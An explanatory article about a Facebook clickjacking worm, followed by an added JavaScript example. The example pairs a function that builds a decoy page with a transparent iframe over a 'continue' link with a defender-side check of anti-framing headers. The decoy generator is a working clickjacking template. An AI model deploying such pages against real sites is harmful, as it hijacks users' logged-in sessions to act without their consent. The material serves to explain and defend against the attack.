A new worm is spreading rapidly via Facebook. The cause is a problem disclosed weeks ago which Facebook seems unable to fix. The result is another wave of crafted status messages, this time linking to a web page which allegedly presents the “101 hottest women in the world”. Those who click on the link are taken to a fairly innocuous page with a picture of Jessica Alba and the message “Click here to continue”. Up to this point nothing bad has happened; however, the page has loaded a hidden iframe in the background, and the click on “continue” actually lands inside that iframe, which posts the link to the visitor's own Facebook profile. This works because users are already logged into Facebook when they read their messages, so the browser attaches their Facebook session to whatever the iframe requests.
The basic problem has been known for several weeks and Facebook has been hit by several waves of attacks exploiting it. Firefox users can at least protect themselves by installing the NoScript extension: it not only blocks JavaScript, it also detects transparent iframes layered over visible page elements and warns of a potential “clickjacking” attack before the click goes through.
Internet Explorer users unfortunately have no comparable protection: if they click through, the link is posted from their account as well.
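To make the mechanism concrete, here is an added example (it is not code from the article, and it is not Facebook's or the worm's actual page). It shows the two halves of the problem described above: a decoy page of the kind the worm uses, which lays a fully transparent iframe over the “Click here to continue” link so that the victim's click, carrying their existing session cookies, hits the framed share button instead; and the check a browser applies on the framed site's response, which is the reason the attack only works when that site sends no anti-framing header. The host names attacker.example and social.example, the share URL, and the function names are assumptions made for the illustration.

```javascript
// Added example: clickjacking via a transparent iframe, and the framing check
// that defeats it. Names and URLs are hypothetical stand-ins.

// Attacker side: a page that looks harmless but positions an invisible iframe of
// a share/like endpoint exactly over a visible link. The victim believes they
// clicked "continue"; the browser delivers the click to the framed page, with
// the victim's cookies for social.example attached.
function buildDecoyPage(shareUrl) {
  return `<!doctype html>
<html><body>
<img src="photo.jpg" alt="">
<p><a id="decoy" href="/next">Click here to continue</a></p>
<iframe id="hidden" src="${shareUrl}" scrolling="no"
  style="position:absolute;top:0;left:0;width:120px;height:30px;
         opacity:0;z-index:10;border:0"></iframe>
<script>
  // Move the invisible frame onto the decoy link's bounding box. The framed
  // page is sized so that its share button sits in the frame's top-left corner.
  var r = document.getElementById('decoy').getBoundingClientRect();
  var f = document.getElementById('hidden');
  f.style.top = (r.top + window.scrollY) + 'px';
  f.style.left = (r.left + window.scrollX) + 'px';
  f.style.width = r.width + 'px';
  f.style.height = r.height + 'px';
</script>
</body></html>`;
}

// Defender side: the framed site decides who may embed it. This mirrors what a
// browser does with the response headers of the framed document:
// Content-Security-Policy frame-ancestors takes precedence when present,
// otherwise X-Frame-Options applies, otherwise anyone may frame the page
// (which is exactly the state the worm relies on). Header names are lower-case.

// Match one CSP source expression (origin, host, or *.host wildcard) against
// the framing page's origin, e.g. "https://attacker.example".
function matchSource(src, framerOrigin) {
  const o = new URL(framerOrigin);
  let scheme = null;
  let host = src;
  if (src.includes('://')) {
    [scheme, host] = src.split('://');
  }
  if (scheme && scheme !== o.protocol.slice(0, -1)) return false;
  host = host.replace(/\/.*$/, '').replace(/:\d+$/, '');
  if (host === '*') return true;
  // "*.example.com" matches subdomains only, not example.com itself.
  if (host.startsWith('*.')) return o.hostname.endsWith(host.slice(1));
  return host === o.hostname;
}

function framingAllowed(headers, framerOrigin, targetOrigin) {
  const csp = headers['content-security-policy'];
  if (csp) {
    const directive = csp
      .split(';')
      .map((d) => d.trim())
      .find((d) => d.startsWith('frame-ancestors'));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1);
      if (sources.length === 0 || sources.includes("'none'")) return false;
      return sources.some((src) =>
        src === "'self'" ? framerOrigin === targetOrigin : matchSource(src, framerOrigin)
      );
    }
  }
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framerOrigin === targetOrigin;
  return true; // no (or unrecognised) policy: the page can be framed by anyone
}

// Constructed inputs: the share endpoint with and without an anti-framing header.
const ATTACKER = 'https://attacker.example';
const TARGET = 'https://social.example';
const SHARE_URL = `${TARGET}/share?u=https://attacker.example/101-hottest`;

function demo() {
  return {
    decoyPageBytes: buildDecoyPage(SHARE_URL).length,
    frameableWithoutHeader: framingAllowed({}, ATTACKER, TARGET),
    frameableWithDeny: framingAllowed({ 'x-frame-options': 'DENY' }, ATTACKER, TARGET),
  };
}
```

The share endpoint that the worm abused was frameable by any origin; with `X-Frame-Options: DENY` (available in Internet Explorer 8 and Firefox of the time, which is why that header was the practical fix) or, in later browsers, `Content-Security-Policy: frame-ancestors 'none'`, the hidden iframe simply does not render and the click falls through to the visible link. NoScript's warning works from the attacker's side instead, by noticing the transparent frame over a clickable element, which is why it helps even when the framed site sends nothing.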